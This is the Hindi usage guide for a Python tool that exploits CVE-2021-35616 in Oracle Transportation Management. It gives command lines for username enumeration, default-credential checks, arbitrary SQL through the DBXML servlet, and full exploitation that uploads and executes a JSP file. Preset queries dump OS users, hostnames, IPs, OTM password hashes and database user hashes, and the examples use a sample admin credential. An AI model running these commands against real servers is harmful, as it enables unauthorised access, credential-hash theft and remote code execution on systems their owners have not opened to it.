
CVE-2021-35616 का शोषण करने के लिए Python टूल
CVE-2021-35616 का शोषण करने के लिए Python टूल
स्क्रिप्ट मॉड्यूल में काम करती है, जिन्हें मैंने निम्नलिखित क्रम में लागू किया है:
► उपयोगकर्ता नाम एन्यूमरेशन
► डिफ़ॉल्ट क्रेडेंशियल की खोज
► DBXML सर्वलेट का उपयोग करके SQL क्वेरी चलाना
► पूर्ण शोषण और JSP निष्पादन
स्क्रिप्ट का सिंटैक्स इस प्रकार है:
.\OracleOTM.py {module} {host TXT file} {additional parameters}
उपयोगकर्ता नाम एन्यूमरेशन: .\OracleOTM.py enum {hosts TXT file} -u users.txt
डिफ़ॉल्ट क्रेडेंशियल की खोज: .\OracleOTM.py default {hosts TXT file}
DBXML सर्वलेट का उपयोग करके SQL क्वेरी चलाएँ: .\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"
मैंने कुछ पूर्व-निर्धारित क्वेरी भी तैयार की हैं जो मुझे उपयोगी लगीं; आप उन्हें सीधे एक्सेस कर सकते हैं, निम्नानुसार:
.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os
OS – सर्वर का OS निकालें
Osuser – DB चलाने वाले OS उपयोगकर्ता को निकालें
Hostname – DB सर्वर का होस्ट नाम
Hostip – DB सर्वर का IP पता
Passwords – OTM उपयोगकर्ताओं और उनके हैश किए गए पासवर्ड निकालता है
Oraversion – DB संस्करण
Dbusershash – DB उपयोगकर्ताओं के पासवर्ड हैश
Dbfileslocation – OS में DB फ़ाइलों का स्थान
पूर्ण शोषण और JSP निष्पादन: .\OracleOTM.py exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"